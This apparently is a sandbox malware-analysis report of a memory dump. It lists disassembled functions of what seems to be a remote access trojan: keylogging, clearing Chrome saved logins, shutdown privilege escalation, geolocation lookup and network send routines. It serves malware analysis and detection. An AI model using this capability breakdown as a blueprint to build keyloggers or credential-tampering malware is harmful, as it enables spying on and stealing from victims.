Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
String ID: Keylogger initialization failure: error
API String ID: 3219506041-952744263
Opcode ID: 157afa062d4d5e7094612e68169f4d0b15ba601623dc04af304768fa31fcf934
Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
Opcode Fuzzy Hash: 157afa062d4d5e7094612e68169f4d0b15ba601623dc04af304768fa31fcf934
Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA

Function 0213BD97 Relevance: 12.1, APIs: 8, Instructions: 146fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,00466A84), ref: 0213BE16
FindClose.KERNEL32(00000000), ref: 0213BE30
FindNextFileA.KERNEL32(00000000,?), ref: 0213BF53
FindClose.KERNEL32(00000000), ref: 0213BF79

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: ad8d22506501732b5b65755a05660b52f98a89d7e06d24c0c2034ee962278d7b
Instruction ID: 83e7a6aafd78dca4c2e19470e791ee4fb03b9d57e598d05fb6aa7f293e4ab7fd
Opcode Fuzzy Hash: ad8d22506501732b5b65755a05660b52f98a89d7e06d24c0c2034ee962278d7b
Instruction Fuzzy Hash: EF516D31984219AFCB06FBB0EC55EEE773BBF11700F5001AAE906A2091FF345E498E55

Function 0040A3E0 Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 0040A416
GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
GetKeyboardLayout.USER32(00000000), ref: 0040A429
GetKeyState.USER32(00000010), ref: 0040A433
GetKeyboardState.USER32(?), ref: 0040A43E
ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A4FA

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
String ID:
API String ID: 1888522110-0
Opcode ID: 4ba0a60493bf1cb7a04a280161e9af6e0206db9f66fbe83c406a8642f04fa518
Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
Opcode Fuzzy Hash: 4ba0a60493bf1cb7a04a280161e9af6e0206db9f66fbe83c406a8642f04fa518
Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6

Function 00454159 Relevance: 11.9, APIs: 1, Strings: 5, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 0045429F

Strings

1#QNAN, xrefs: 004554A5
1#IND, xrefs: 00455497
1#SNAN, xrefs: 0045549E
1#INF, xrefs: 004554AC
PkGNG, xrefs: 0045415B

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN$PkGNG
API String ID: 4168288129-3873169313
Opcode ID: d95690e0b6e6c864278ea550f2cfeefdc475363cedebba9bd57c416b56382187
Instruction ID: adbfc57a6ba9eb8fd61ef87ee4788d0f45260f030e03b769905361500cdb2a19
Opcode Fuzzy Hash: d95690e0b6e6c864278ea550f2cfeefdc475363cedebba9bd57c416b56382187
Instruction Fuzzy Hash: EBC26E71E046288FDB25CE28DD407EAB3B5EB85306F1541EBD80DE7241E778AE898F45

Function 00449190 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00449212
_free.LIBCMT ref: 00449236
_free.LIBCMT ref: 004493BD
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
_free.LIBCMT ref: 00449589

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID:
API String ID: 314583886-0
Opcode ID: e51e2b160430e069a94018d2a40d83d225257a5f61c10d126208887eb2308fed
Instruction ID: 779aab753f07af14b01adf3fce5c8211df4e7f9331a35af1166ddbde82723190
Opcode Fuzzy Hash: e51e2b160430e069a94018d2a40d83d225257a5f61c10d126208887eb2308fed
Instruction Fuzzy Hash: CAC15771900205ABFB24DF69CC41AAFBBA8EF46314F1405AFE89497381E7788E42D758

Function 021398CC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 222fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 021398D1
FindFirstFileW.KERNEL32(00000000,?), ref: 02139949
FindNextFileW.KERNEL32(00000000,?), ref: 02139972
FindClose.KERNEL32(?), ref: 02139989

Strings

~E, xrefs: 021398CC

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstH_prologNext
String ID: ~E
API String ID: 1157919129-1083419430
Opcode ID: f1abb1e18261a1922addd69d7cffa3ae5e96847022b02d1b31507e848c25f0fe
Instruction ID: 81fb27cba65ccec3117a0e7ef17069e97918ea632aaf702b954fdda2824bbd5e
Opcode Fuzzy Hash: f1abb1e18261a1922addd69d7cffa3ae5e96847022b02d1b31507e848c25f0fe
Instruction Fuzzy Hash: 00811C329801189FCB16FBA4DD909EE777BAF54310F10426AD916A71A0EF74AF49CF90

Function 02138A73 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 186fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02138A78
FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02138B31
__CxxThrowException@8.LIBVCRUNTIME ref: 02138B59
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02138B66
FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02138C7C

Strings

hdF, xrefs: 02138A9B

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Find$File$CloseException@8FirstH_prologNextThrow
String ID: hdF
API String ID: 1771804793-665520524
Opcode ID: 97e0a785e7b9d9480091617be28e576f445f29e9a0369538a25a55855c286783
Instruction ID: 35847182eca36f5f9d324b33f042d801cd44177e547139af197797aa8108e785
Opcode Fuzzy Hash: 97e0a785e7b9d9480091617be28e576f445f29e9a0369538a25a55855c286783
Instruction Fuzzy Hash: 2B516C72981209AFCF06FBA4DD959EE777BAF50310F500569A90AA3090EF349B49CF91

Function 004167B4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D

ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 0041686B
GetProcAddress.KERNEL32(00000000), ref: 00416872

Strings

!D@, xrefs: 00417089
PowrProf.dll, xrefs: 00416866
SetSuspendState, xrefs: 00416861

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
String ID: !D@$PowrProf.dll$SetSuspendState
API String ID: 1589313981-2876530381
Opcode ID: bc2f27ce3311b7facf94bca3d7d388d746dc11f75aa34a6b70f09b1d9e98b6a2
Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
Opcode Fuzzy Hash: bc2f27ce3311b7facf94bca3d7d388d746dc11f75aa34a6b70f09b1d9e98b6a2
Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE

Function 0045243C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513

Strings

OCP, xrefs: 00452490
['E, xrefs: 004524F3, 004524CA
ACP, xrefs: 0045245A

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP$['E
API String ID: 2299586839-2532616801
Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398

Function 0041B380 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
InternetCloseHandle.WININET(00000000), ref: 0041B41C
InternetCloseHandle.WININET(00000000), ref: 0041B41F

Strings

http://geoplugin.net/json.gp, xrefs: 0041B3B7

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleOpen$FileRead
String ID: http://geoplugin.net/json.gp
API String ID: 3121278467-91888290
Opcode ID: e63041225501ac0f49c70a3343464f1d86e2a3407822d50370325415ffbf4502
Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
Opcode Fuzzy Hash: e63041225501ac0f49c70a3343464f1d86e2a3407822d50370325415ffbf4502
Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA

Function 0040BA12 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
GetLastError.KERNEL32 ref: 0040BA58

Strings

[Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
[Chrome StoredLogins not found], xrefs: 0040BA72
UserProfile, xrefs: 0040BA1E
\AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
API String ID: 2018770650-1062637481
Opcode ID: 8b62d6553028fce718f89731eeb51600a516b9aa04cf6dc599271b345071c46b
Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
Opcode Fuzzy Hash: 8b62d6553028fce718f89731eeb51600a516b9aa04cf6dc599271b345071c46b
Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE

Function 00417952 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
OpenProcessToken.ADVAPI32(00000000), ref: 00417966
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
GetLastError.KERNEL32 ref: 0041799D

Strings

SeShutdownPrivilege, xrefs: 00417972

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 3534403312-3733053543
Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5

Function 00409253 Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00409258

Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0

Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36

__CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
FindClose.KERNEL32(00000000), ref: 004093C1

Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,00000000,00000000,?,00474EF8,?), ref: 00404E38
Part of subcall function 00404E26: SetEvent.KERNEL32(00000000), ref: 00404E43
Part of subcall function 00404E26: CloseHandle.KERNEL32(00000000), ref: 00404E4C

FindClose.KERNEL32(00000000), ref: 004095B9

Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
String ID:
API String ID: 1824512719-0
Opcode ID: 01df76cf6682e8b71544155527507282fbcac48473d155c998fd7c444a94c691
Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
Opcode Fuzzy Hash: 01df76cf6682e8b71544155527507282fbcac48473d155c998fd7c444a94c691
Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98

Function 0041AA4A Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ManagerStart
String ID:
API String ID: 276877138-0
Opcode ID: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
Opcode Fuzzy Hash: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9

Function 00451CD8 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 236COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
Part of subcall function 00448215: _abort.LIBCMT ref: 00448293

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444A73,?,?,?,?,004444CA,?,00000004), ref: 00451DBA
_wcschr.LIBVCRUNTIME ref: 00451E4A
_wcschr.LIBVCRUNTIME ref: 00451E58
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,sJD,00000000,?), ref: 00451EFB

Strings

sJD, xrefs: 00451DD1, 00451E19, 00451EC1

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID: sJD
API String ID: 4212172061-3536923933
Opcode ID: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
Instruction ID: 601d6103ecad0283333aca7e4f79148897faf6e4cefa34abd84194fcdbd45a0d
Opcode Fuzzy Hash: 7ea90a810ccb8eded513053f15f94d45dc96679ac5d2c45bddb92c1ff4a69e8d
Instruction Fuzzy Hash: ED61FA35500606AAE724AB75CC86BBB73A8EF04316F14046FFD05D7292EB78ED48C769

Function 0040F7A7 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 88sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00413549: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,00000000,00000000), ref: 00413569
Part of subcall function 00413549: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 00413587
Part of subcall function 00413549: RegCloseKey.ADVAPI32(00000000), ref: 00413592

Sleep.KERNEL32(00000BB8), ref: 0040F85B
ExitProcess.KERNEL32 ref: 0040F8CA

Strings

pth_unenc, xrefs: 0040F7BD, 0040F804, 0040F871
override, xrefs: 0040F7CC
5.1.0 Pro, xrefs: 0040F836, 0040F8A3

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: CloseExitOpenProcessQuerySleepValue
String ID: 5.1.0 Pro$override$pth_unenc
API String ID: 2281282204-182549033
Opcode ID: bc1be6459073602c737430f7b82db798cb6416b862091f8f7e094519bbbbbb63
Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
Opcode Fuzzy Hash: bc1be6459073602c737430f7b82db798cb6416b862091f8f7e094519bbbbbb63
Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF

Function 021826A3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,021829C2,?,00000000), ref: 0218273C
GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,021829C2,?,00000000), ref: 02182765
GetACP.KERNEL32(?,?,021829C2,?,00000000), ref: 0218277A

Strings

ACP, xrefs: 021826C1
OCP, xrefs: 021826F7

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
Instruction ID: d8884b3acfef24ee520485df0d9a770e644dba63d675b038e1eaa0fc97fb13c9
Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
Instruction Fuzzy Hash: DE21F532A80181ABDB3BAF16CDC0B9B73A7FF54A64B568564EC1AD7110E732DD41CB90

Function 02137AA3 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 86fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 02137ABE
FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 02137B86

Part of subcall function 02134D08: send.WS2_32(?,00000000,00000000,00000000), ref: 02134D9D

Strings

XPG, xrefs: 02137ADE
(eF, xrefs: 02137B07
XPG, xrefs: 02137BA1

Memory Dump Source

Source File: 00000000.00000002.2409787200.0000000002130000.00000040.00001000.00020000.00000000.sdmp, Offset: 02130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2130000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: FileFind$FirstNextsend
String ID: (eF$XPG$XPG
API String ID: 4113138495-1496965907
Opcode ID: da2a088c2c47bfc86c5ef0d10107ac4426fe09f0bf14043eaa07d8cc52736815
Instruction ID: 6ba174a99907e150d7a78c9f1b8853b7c066708234c517b67fc274503c1a3437
Opcode Fuzzy Hash: da2a088c2c47bfc86c5ef0d10107ac4426fe09f0bf14043eaa07d8cc52736815
Instruction Fuzzy Hash: DA2141311842449FC616FB60DC94DEFB7ABAF95350F400A29F99652094EF35AA0DCE52

Function 0040B164 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
wsprintfW.USER32 ref: 0040B1F3

Part of subcall function 0040A636: SetEvent.KERNEL32(00000000,?,00000000,0040B20A,00000000), ref: 0040A662

Strings

Offline Keylogger Started, xrefs: 0040B16B
], xrefs: 0040B180
[%04i/%02i/%02i %02i:%02i:%02i , xrefs: 0040B17B

Memory Dump Source

Source File: 00000000.00000002.2409329625.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2409329625.0000000000474000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2409329625.0000000000478000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ltlbVjClX9.jbxd

Yara matches

Similarity

API ID: EventLocalTimewsprintf
String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
API String ID: 1497725170-248792730
Opcode ID: 7ba7107dd0a0becbf17e98e0f4c88f938a843bd542848fefc6ff687fb31ca14d
Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
Opcode Fuzzy Hash: 7ba7107dd0a0becbf17e98e0f4c88f938a843bd542848fefc6ff687fb31ca14d
Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC

Function 0041B4A8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B4B9
LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3

